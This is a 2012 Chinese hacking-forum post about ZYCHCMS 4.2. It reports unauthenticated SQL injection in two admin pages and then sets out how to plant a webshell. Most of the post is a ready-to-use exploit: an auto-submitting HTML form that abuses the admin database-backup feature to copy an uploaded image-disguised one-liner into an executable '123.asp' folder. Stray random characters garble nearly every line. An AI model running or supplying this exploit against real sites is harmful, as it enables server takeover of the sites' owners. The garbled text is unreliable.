找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1722|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
6 v* U1 ?& J0 }

4 r" h& ?  Q+ S# [! }# K5 T
! w  W" a: `5 z% o8 ]3 c$ v, _& z) O9 P$ f3 j, Q
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)6 A/ o! I% x" A' u" ^
①SQL注射漏洞, V' [4 h1 U4 Q; }# p
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
, g- j' P; l9 v; \$ }* [; B 漏洞原因:未过滤
$ P# i" e1 t) ^  _$ ` 漏洞代码:
5 Q/ Q/ W6 F8 X+ l# m  S 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。% K7 |9 s- V, k* I% I
修复方法:在文件开头加入代码" K- r2 A/ ^4 Z, \7 B
$ i" v# x1 t& E7 X- M! k+ A+ J
$ g4 R5 f9 e6 z: Z
②后台拿WBSHELL
/ H. Q3 n$ `+ I9 _1 i. q& Q3 A8 _" s' O 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。& a+ i4 D/ ]( q
这里在网上找了一个,改了下,将就着用。4 F+ {' x* x( _1 T* e
以下是代码本地提交代码
: }/ ~1 p7 y. T5 I0 i ) h. T0 F; p* b4 |( k) o
1 K0 R" I$ H9 ]. s/ l5 o( F
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
6 S% Q7 T& @8 e# K( D" D <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>& y6 n' D4 |/ g' V/ f: [, a. |* c
<tr>: }3 \! s+ I( i% W. A* x
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
0 {: Z" N( D: K& M" S; l </tr>
; N+ y, G' F' |; D4 z/ U( o <tr># X+ ?9 M/ r3 ?
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>5 `: ~1 l  ~0 W$ \, O3 w( j
</span>
" H. C4 O  h! {9 } <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
; M0 u" c* S" k) F  M/ Q# ?5 Y <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >3 M" T* Q5 K8 `/ g5 @
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>/ N2 b6 O" D, M' ^+ u3 d: B" E
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
5 A2 g& p  x( k( a9 M <div align=”left”>
) _: v+ i0 ]5 o <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />, T8 f& d( C5 P6 w" J5 `
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>6 @  i: \! Y( o
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />, [0 r$ U, O' _1 }0 t2 Y3 D4 }5 I6 F
</div></td>
; c8 i# ^8 J- M/ R </tr>6 z, A: z* P. f; `& a
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
" p8 Y) L5 u# \8 T+ k5 \8 h8 p <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
3 y3 b4 s- Q% I6 L* o3 [ <td class=”td”><div align=”left”>
* V- g0 l3 q% `! B <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
' |5 Y4 M; f, o: D$ r; m# J5 r( a* i [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>3 z$ k; ~% ]) H( F
</tr>
7 o6 _2 R' D& p6 b6 W* k; n. | <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>! t. t# _2 a& Q6 c% p4 D, z4 I
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
. R7 E" `  d" N. \* ~ <td class=”td”><div align=”left”>
% W# C1 n  g% B) | <input type=”submit” value=”确定备份” class=”btn”( p' D8 X% t* a% \
</div></td>' n4 x/ g- x4 D% C; y; W6 T( i
</tr>
' `% ^8 |# K$ \: C3 A* Y </table></td></tr></form>
2 q: T0 X: E/ L& M! z  X1 {+ d </table>' l) ?6 t- T# l* ?# N6 ~) H4 y# |$ G6 O
</td>
1 R# {) s' {* C </tr>
8 o" v1 t* E+ A; A </table>
9 t5 Q5 k9 y+ ]* v9 Y <script>2 v; J7 a6 o2 y8 C1 q
document.all.add.submit();
; l- p3 e' V$ z/ T5 W) o7 k </script>
  D. l' A9 W. v; a0 t& N; ^5 F $ O0 I2 X( z2 l1 O
+ w2 F+ Z4 L  g7 G
0 c3 U* Z* l# Y' ~

) _: F" a" t2 V: h# r1 b
  y* N3 k' T0 e! B6 t/ i4 C) [2 N
) `2 O- d& y* s; p* z. \
& x: i" [( x" N; d( e4 K2 ^7 Q- E, D6 [  P& ?6 I: G
% {' y% r- H2 g, q" ]; g

& A: q3 L2 l1 U# A# H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表